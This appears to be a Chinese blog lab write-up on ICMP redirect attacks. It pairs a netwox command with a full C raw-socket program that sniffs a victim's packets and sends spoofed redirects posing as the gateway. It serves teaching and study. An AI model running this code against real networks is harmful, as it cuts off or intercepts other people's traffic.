RAW SOCKET实现ICMP重定向攻击

已于 2022-04-07 17:56:49 修改
阅读量4.1k 收藏 3
点赞数
文章标签: c语言 网络
于 2022-04-06 16:40:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40955029/article/details/123991389
版权

ICMP 重定向攻击 网络安全 伪造报文 RAW SOCKET
关键词由CSDN通过智能技术生成

ICMP重定向攻击

一台主机通过网关G1访问网络X,G1在转发时发现主机直接通过另一个网关G2访问网络X会更快,这时候就可以发送一个重定向报文告知G1,访问网络X时的默认网关调整为G2。这样,在下一次主机想要访问网络X时,就会通过G2进行访问。

这时如果一个主机2想要对主机1进行攻击,可以伪装成G1,向主机1发送一个重定向报文,让主机1把对X的默认路由修改成一个错误地址,这样主机1就没法再访问网络X了。

但是ICMP重定向报文不能这么直接发送(否则这样的网络就太容易受到攻击了)。在正常的情况下,只有G1收到了主机1发送到网络X的包之后,才可能发送一个重定向报文给主机1。所以为了让主机1相信这个重定向报文是G1发送的,G1会把主机1发过来的原始报文的一部分,写到重定向报文中,证明自己是网关G1。

如果主机2和主机1同在一个网段,它想发起重定向攻击,就必须:

  • 抓取主机1发送给G1的包
  • 利用这个包,伪装成G1向主机1发送ICMP重定向报文

ICMP重定向报文格式

可以利用netwox和wireshark来模拟一下这个攻击:

开启两个虚拟机,分别为攻击者和被攻击者。这里的ip地址分别为:

  • 网关:192.168.52.2
  • 攻击者:192.168.52.144
  • 被攻击者:192.168.52.146

被攻击者持续ping百度:

ping www.baidu.com

在攻击者这里用netwox来做一下重定向攻击:

以源ip = 192.168.52.2的身份构造一个重定向包发送给被攻击者,指定了新的网关为192.168.52.144,即攻击者自己。

sudo netwox 86 -g 192.168.52.144 -i 192.168.52.2

受害者视角

由于攻击者默认不转发包,所以被攻击者把ping包发送给攻击者后就不会再ping通了。

下面是原始ping包:

重定向包中可以看到源ip是网关地址,且包含一部分原始报文:

下面的实验就是用raw socket来实现一遍netwox的工作。

RAW SOCKET

SOCK_STREAM和SOCK_DGRAM都只能处理运输层往上的数据,而为了实现这个攻击,需要自己处理网络层的数据,所以需要用到SOCK_RAW。

使用RAW SOCKET处理网络层数据时,内核会自动帮我们处理ip头部信息,但是为了伪装成G1,我们ip头部的src就必须修改为网关G1的ip地址。这时可以用setsockopt函数设置socket选项,让我们自己构造ip头部。

代码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/ether.h>

#define BUFFSIZE 1 << 10
#define CAPTURE_SIZE 28
#define IP_HEAD_LENGTH 20
#define ICMP_HEAD_LENGTH 8

char* gateway_ip = "192.168.52.2";
char* self_ip = "192.168.52.144";
char* target_ip = "192.168.52.146";

/* 抓到目标ip发出的包后,将28字节内容写入pkt中 */
void Sniffer(unsigned char* pkt) {
  unsigned char buff[BUFFSIZE];
  int rawsock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
  if (rawsock < 0) {
    printf("sniffer socket error.\n");
    exit(0);
  }
  /* 直到抓到目标ip发出的包 */
  while(1) {
    if (recvfrom(rawsock, buff, BUFFSIZE, 0, NULL, NULL) < 0) {
      printf("sniffer recv error.\n");
      exit(0);
    }
    struct ip* ip_data = (struct ip*)(buff + 14);
    if (strcmp(target_ip, inet_ntoa(ip_data->ip_src)) == 0) {
      memcpy(pkt, ip_data, CAPTURE_SIZE);
      return;
    }
  }
}

/* 校验和 */
uint16_t Checksum(uint16_t* data, int length) {
  uint32_t sum = 0;
  while (length > 1) {
    sum += *data;
    ++data;
    length -= 2;
  }
  if (length == 1) {
    sum += ((uint32_t)(*((unsigned char*)(data)))) << 8;
  }
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

/* 根据pkt,构造icmp重定向包并发送 */
void Attack(char* pkt) {
  int sendsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); 
  if (sendsock < 0) {
    printf("Attack socket error.\n");
    exit(0);
  }

  int on = 1;
  /* IP_HDRINCL: 自定义ip头部 */
  if (setsockopt(sendsock, SOL_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
    printf("Attack socket opt error.\n");
    exit(0);
  }

  int size = IP_HEAD_LENGTH + ICMP_HEAD_LENGTH + CAPTURE_SIZE;
  unsigned char sendbuff[size];

  /* 构造ip头部 */
  struct ip* ip_head = (struct ip*)sendbuff;
  ip_head->ip_v = 4; //version
  ip_head->ip_hl = 5; //head length(4Bytes)
  ip_head->ip_tos = 0;
  ip_head->ip_len = size; //total length(1Bytes)
  ip_head->ip_id = 0;
  ip_head->ip_off = 0; //fragment
  ip_head->ip_ttl = 255; //time to live
  ip_head->ip_p = IPPROTO_ICMP;
  ip_head->ip_sum = 0;
  inet_aton(gateway_ip, &(ip_head->ip_src));
  inet_aton(target_ip, &(ip_head->ip_dst));

  /* 构造icmp头部 */
  struct icmp* icmp_head = (struct icmp*)(sendbuff + IP_HEAD_LENGTH);
  icmp_head->icmp_type = ICMP_REDIRECT;
  icmp_head->icmp_code = ICMP_REDIR_HOST;
  icmp_head->icmp_cksum = 0;
  inet_aton(self_ip, &(icmp_head->icmp_gwaddr)); //自身ip作为重定向中的网关ip
  memcpy(((char*)icmp_head) + ICMP_HEAD_LENGTH, pkt, CAPTURE_SIZE); //目标主机发出的包的一部分
  icmp_head->icmp_cksum = Checksum(icmp_head, ICMP_HEAD_LENGTH + CAPTURE_SIZE);
  
  /* 发送重定向包 */
  struct sockaddr_in target;
  target.sin_family = AF_INET;
  inet_aton(target_ip, &(target.sin_addr));
  if (sendto(sendsock, sendbuff, size, 0, (struct sockaddr*)&target, sizeof(target)) < 0) {
    printf("Attack send error.\n");
    exit(0);
  }
  
  close(sendsock);
}

int main() {
  /* 存原始报文,来构造重定向包 */ 
  unsigned char pkt[CAPTURE_SIZE];
  while (1) {
    Sniffer(pkt);
    Attack(pkt);
  }
  return 0;
}

注:需要开启混杂模式,才能抓取到目的ip不是本机的包,程序在运行时需要sudo。

Zzxy1999_
关注
利用RawSocket实现简单的Ping程序 ICMP协议
12-13
利用RawSocket实现简单的Ping程序 ICMP协议 编程语言 C++ 操作系统 Linux(Ubuntu 10.0) 开发环境(可选)Qt4.7.0
ICMP重定向攻击
weixin_30279315的博客
08-15 887
目录 ICMP数据报格式 smurf攻击 ICMP重定向攻击 基于libpcap的sniffer raw socket 定义包头 解析数据包 重定向 ICMP数据报格式 htt...
ICMP重定向攻击
honest_gg的博客
12-20 2282
实验工具: ENSP(搭建拓扑) VM虚拟机(kali、win7) 1.环境配置 ENSP: 1.1 使用设备 1.2 ENSP设备配置 Kali(v8网卡) win7(v1网卡) 路由器配置 路由器配置查询 服务器配置 VM虚拟机: 1.3 VM虚拟机配置(kali、win7) ——具体IP,子网,网关配置方法如实验四一样 目的:让kali、win7可以通...
实现ICMP重定向攻击
weixin_38885346的博客
12-28 1980
环境:攻击机Ubuntu 18 ,受攻击机Windows7 一、使用netwox体会实验效果,netwox发出的ICMP重定向包的目的IP是受害者的IP,也即,netwox先抓到受害者的数据包,根据捕获包的IP地址,再构造攻击包。 1.Ubuntu安装netwox sudo apt-get install netwox 2.用netwox做重定向攻击 netwox 86 -g 新的网关地址 -i 目标机当前使用的网关地址 3.在目标机上安装wireshark程序(参考网上),执行ping命令,并启动wi
实验一:ICMP重定向攻击
chuxuezheerer的博客
10-09 5721
实验原理: ICMP重定向信息是路由器向主机提供实时的路由信息,当一个主机收到ICMP重定向信息时,它就会根据这个信息来更新自己的路由表。由于缺乏必要的合法性检查,如果一个黑客想要被攻击的主机修改它的路由表,黑客就会发送ICMP重定向信息给被攻击的主机,让该主机按照黑客的要求来修改路由表。 在VMware虚拟环境中(Virtual Box不同),.2是充当网关的默认地址(通过route命令可以查看当前的网关和路由信息);所以攻击者可以冒充.2发出重定向包,通知受害者修改自己的网关为攻击者指定的gw地址;如果
icmp重定向攻击实验
bunner_的博客
12-27 3015
使用netwox测验 实验环境: 攻击机:kali linux 192.168.181.129 靶机:ubuntu20.04 192.168.181.131 默认网关:192.168.181.2 1、安装必要工具 # 安装 ifconfig 等网络命令 $ sudo apt-get install net-tools # 安装 traceroute $ sudo apt-get install traceroute # 安装 netwox 工具, 攻击机需要 $ sudo apt-get install
20221902 2022-2023-2 《网络攻防实践》第四次作业
xiannvyeye的博客
03-23 599
ARP(Address Resolution Protocol)即地址解析协议,是一种将IP地址转化成物理地址的协议。不管网络层使用什么协议,在网络链路上传送数据帧时,最终还是必须使用硬件地址的。ARP欺骗原理则是通过发送欺骗性的ARP数据包致使接收者收到数据包后更新其ARP缓存表,从而建立错误的IP与MAC对应关系,源主机发送数据时数据便不能被正确地址接收。如果虚假报文的MAC是伪造的不存在的,实现ARP攻击,结果为中断通信/断网!
ICMP重定向
08-06
ICMP重定向报文ICMP控制报文中的一种。在特定的情况下,当路由器检测到一台机器使用非优化路由的时候,它会向该主机发送一个ICMP重定向报文,请求主机改变路由。路由器也会把初始数据报向它的目的地转发
ICMP重定向介绍,ICMP重定向介绍
08-17
ICMP重定向介绍ICMP重定向介绍ICMP重定向介绍
网络安全ICMP重定向攻击
木瓜有益健康的博客
03-28 5062
网络安全——ICMP重定向攻击网络命令网络工具——netwox 网络命令 网络不可用 $ ping ${域名} $ ping ${ip地址} $ ifconfig #lo:本地网卡;enss:朝外发包的网卡 $ ifconfig -a #对比上一条结果,查看哪个网卡未开启 $ route #route -n查看本机网络状况 $ netstat -lt #正在监听的tcp端口,-p显示进程号 $...
使用Raw Socket实现ICMP重定向
weixin_42785235的博客
03-24 717
#include<stdio.h> #include<stdlib.h> #include<string.h> #include<netinet/ip_icmp.h> #include<netinet/tcp.h> #include<netinet/udp.h> #include<arpa/inet.h> #include<sys/socket.h> #include<sys/types.h> #i.
信息安全-ICMP重定向攻击实现代码
Java硬件工程师的博客
12-27 2044
#include <stdio.h> #include <pcap.h> #include <time.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <neti
c语言基于Socket使用ICMP协议发现网络中的活动主机
走向CTO的路上...
11-27 1093
如果收到响应,则表示目标主机处于活动状态。发送方发送一个ICMP Echo Request报文到目标主机,目标主机接收到后会回复一个ICMP Echo Reply报文。通过测量往返时间和判断是否收到回复,可以判断网络的延迟和目标主机是否可达。ICMP是在网络层(OSI模型的第三层)上工作的一种协议,主要用于网络中的错误报告、网络故障诊断和网络拓扑发现。通过发送ICMP Echo Request报文网络中的所有可能IP地址,可以发现网络中哪些主机处于活动状态。可以用于发现网络中活动的主机,尤其在局域网中。
网络协议与攻击模拟_04ICMP协议与ICMP重定向
最新发布
fencecat的博客
01-13 1927
重定向ICMP控制报文中的一种,在某一种特定的情况下,当路由器检测到一台机器使用的是非优化路由的时候,这个时候路由器回会主机发送ICMP重定向报文,使得它走优化路由。
raw socket icmp
07-29
原始套接字(Raw Socket)是一种网络编程技术,允许程序直接访问网络层的数据。ICMP(Internet Control Message Protocol)是一种网络协议,用于在IP网络中传递错误消息和操作控制消息。 使用原始套接字可以实现对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值